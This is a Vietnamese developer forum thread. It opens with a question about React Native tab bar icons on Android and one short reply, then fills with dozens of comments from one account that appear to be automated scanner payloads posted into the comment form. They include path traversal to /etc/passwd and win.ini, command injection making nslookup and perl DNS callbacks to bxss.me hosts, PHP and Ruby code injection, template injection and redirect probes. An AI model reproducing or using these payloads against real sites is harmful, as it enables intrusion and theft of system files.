Cho mình hỏi chèn icon cho Tabbar bên Android dùng hàm gì ạ ? Mình đọc trên doc thì IOS dùng tabBarIcon nó kêu only IOS, mình cũng ShowIcon : true vào mà vẫn không được.

Viết câu trả lời

Drop Images

30 Bình luận

hoclaptrinh avatar

Do native mỗi bên khác nhau nên tùy thư viện mà nó ghi hỗ trợ tab bar hoặc sidemenu.

Bạn xài những packages nào? Show ra ae mới gợi ý cho được

phaptl avatar

@hoclaptrinh : dsdsddsd s

phaptl avatar
phaptl avatar
nhiepphong avatar

@hoclaptrinh : ngon quá

phqghume avatar
phqghume avatar

response.write(9038146*9780106)

phqghume avatar

'+response.write(9038146*9780106)+'

phqghume avatar

"+response.write(9038146*9780106)+"

phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar

Yv77fmln

phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar

echo vnqjvf$()\ cgtfru\nz^xyu||a #' &echo vnqjvf$()\ cgtfru\nz^xyu||a #|" &echo vnqjvf$()\ cgtfru\nz^xyu||a #

phqghume avatar

&echo eagzve$()\ qdbhbl\nz^xyu||a #' &echo eagzve$()\ qdbhbl\nz^xyu||a #|" &echo eagzve$()\ qdbhbl\nz^xyu||a #

phqghume avatar

|echo aptopo$()\ sfclyy\nz^xyu||a #' |echo aptopo$()\ sfclyy\nz^xyu||a #|" |echo aptopo$()\ sfclyy\nz^xyu||a #

phqghume avatar

../../../../../../../../../../../../../../etc/passwd

phqghume avatar

(nslookup hitacbryhxmkgdd59d.bxss.me||perl -e "gethostbyname('hitacbryhxmkgdd59d.bxss.me')")

phqghume avatar

../../../../../../../../../../../../../../windows/win.ini

phqghume avatar

$(nslookup hitppmxzzfekg87fe0.bxss.me||perl -e "gethostbyname('hitppmxzzfekg87fe0.bxss.me')")

phqghume avatar
phqghume avatar

../../../../../../../../../../../../../../../proc/version

phqghume avatar

&(nslookup hitrrysybpovh5ced8.bxss.me||perl -e "gethostbyname('hitrrysybpovh5ced8.bxss.me')")&'\"0&(nslookup hitrrysybpovh5ced8.bxss.me||perl -e "gethostbyname('hitrrysybpovh5ced8.bxss.me')")&'

phqghume avatar

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

phqghume avatar

|(nslookup hiteniyayyrnh75711.bxss.me||perl -e "gethostbyname('hiteniyayyrnh75711.bxss.me')")

phqghume avatar

../../../../../../../../../../etc/passwd.vn/thanh-vien/hoclaptrinh) :

phqghume avatar

(nslookup hitqniymfinyydc1a9.bxss.me||perl -e "gethostbyname('hitqniymfinyydc1a9.bxss.me')")

phqghume avatar

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.vn/thanh-vien/hoclaptrinh) :

phqghume avatar

;(nslookup hitttjqlmcvmg951d2.bxss.me||perl -e "gethostbyname('hitttjqlmcvmg951d2.bxss.me')")|(nslookup hitttjqlmcvmg951d2.bxss.me||perl -e "gethostbyname('hitttjqlmcvmg951d2.bxss.me')")&(nslookup hitttjqlmcvmg951d2.bxss.me||perl -e "gethostbyname('hitttjqlmcvmg951d2.bxss.me')")

phqghume avatar

/../..//../..//../..//../..//../..//etc/passwd.vn/thanh-vien/hoclaptrinh) :

phqghume avatar

.\./.\./.\./.\./.\./.\./etc/passwd

phqghume avatar

/etc/passwd

phqghume avatar

%2fetc%2fpasswd

phqghume avatar

/.././.././.././.././.././.././.././../etc/./passwd%00

phqghume avatar

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

phqghume avatar

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

phqghume avatar

../././../././../././../././../././../././../././../././../././../././etc/passwd

phqghume avatar

..

phqghume avatar
phqghume avatar

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

phqghume avatar

12345'"\'\");|]*{ <>

phqghume avatar

file:///etc/passwd

phqghume avatar
phqghume avatar
phqghume avatar

/../../../../../../../etc/passwd

phqghume avatar
phqghume avatar
phqghume avatar

/WEB-INF/web.xml

phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar

C:\WINDOWS\system32\drivers\etc\hosts

phqghume avatar
phqghume avatar
phqghume avatar

../../../../../../../../../../windows/win.ini.vn/thanh-vien/hoclaptrinh) :

phqghume avatar
phqghume avatar

/../../../../../../../../../../boot.ini

phqghume avatar
phqghume avatar

${9999321+9999950}

phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar

................\windows\win.ini

phqghume avatar
phqghume avatar
phqghume avatar

................\windows\win.ini

phqghume avatar
phqghume avatar
phqghume avatar

/.\./.\./.\./.\./.\./.\./windows/win.ini

phqghume avatar
phqghume avatar
phqghume avatar

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

phqghume avatar

@hoclaptrinh :e@hoclaptrinh : &n944877=v938033

phqghume avatar
phqghume avatar

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

phqghume avatar
phqghume avatar
phqghume avatar

unexisting/../../../../../../../../../../windows/win.ini....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................\

phqghume avatar
phqghume avatar

1some_inexistent_file_with_long_name.vn/thanh-vien/hoclaptrinh) :

phqghume avatar
phqghume avatar

WEB-INF/web.xml

phqghume avatar
phqghume avatar
phqghume avatar

WEB-INF\web.xml

phqghume avatar
phqghume avatar
phqghume avatar

bxss.me

phqghume avatar
phqghume avatar
phqghume avatar

)

phqghume avatar
phqghume avatar

!(()&&!|||

phqghume avatar
phqghume avatar

^(#$!@#$)(()))**

phqghume avatar
phqghume avatar
phqghume avatar

'.gethostbyname(lc('hitnc'.'houfsltw62426.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(109).chr(68).chr(100).chr(76).'

phqghume avatar
phqghume avatar
phqghume avatar

".gethostbyname(lc("hitty"."eyeluoqf4647a.bxss.me."))."A".chr(67).chr(hex("58")).chr(121).chr(89).chr(117).chr(79)."

phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar

"+"A".concat(70-3).concat(22*4).concat(118).concat(72).concat(112).concat(74)+(require"socket" Socket.gethostbyname("hitts"+"qhmzdidnfcc59.bxss.me.")[3].to_s)+"

phqghume avatar

'+'A'.concat(70-3).concat(22*4).concat(118).concat(66).concat(115).concat(66)+(require'socket' Socket.gethostbyname('hitxb'+'mcbfljtr8651a.bxss.me.')[3].to_s)+'

phqghume avatar

bxss.me/t/xss.html?%00

phqghume avatar

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

phqghume avatar

';print(md5(31337));$a='

phqghume avatar

";print(md5(31337));$a="

phqghume avatar

tra-loi-comment

phqghume avatar
phqghume avatar

${@print(md5(31337))}

phqghume avatar
phqghume avatar

tra-loi-comment

phqghume avatar

${@print(md5(31337))}\

phqghume avatar
phqghume avatar
phqghume avatar

tra-loi-comment/.

phqghume avatar

'.print(md5(31337)).'

phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

phqghume avatar
phqghume avatar

/xfs.bxss.me

phqghume avatar
phqghume avatar

921051

phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar

//xfs.bxss.me

phqghume avatar
phqghume avatar
phqghume avatar

/\xfs.bxss.me

phqghume avatar
phqghume avatar
phqghume avatar

'"

phqghume avatar
phqghume avatar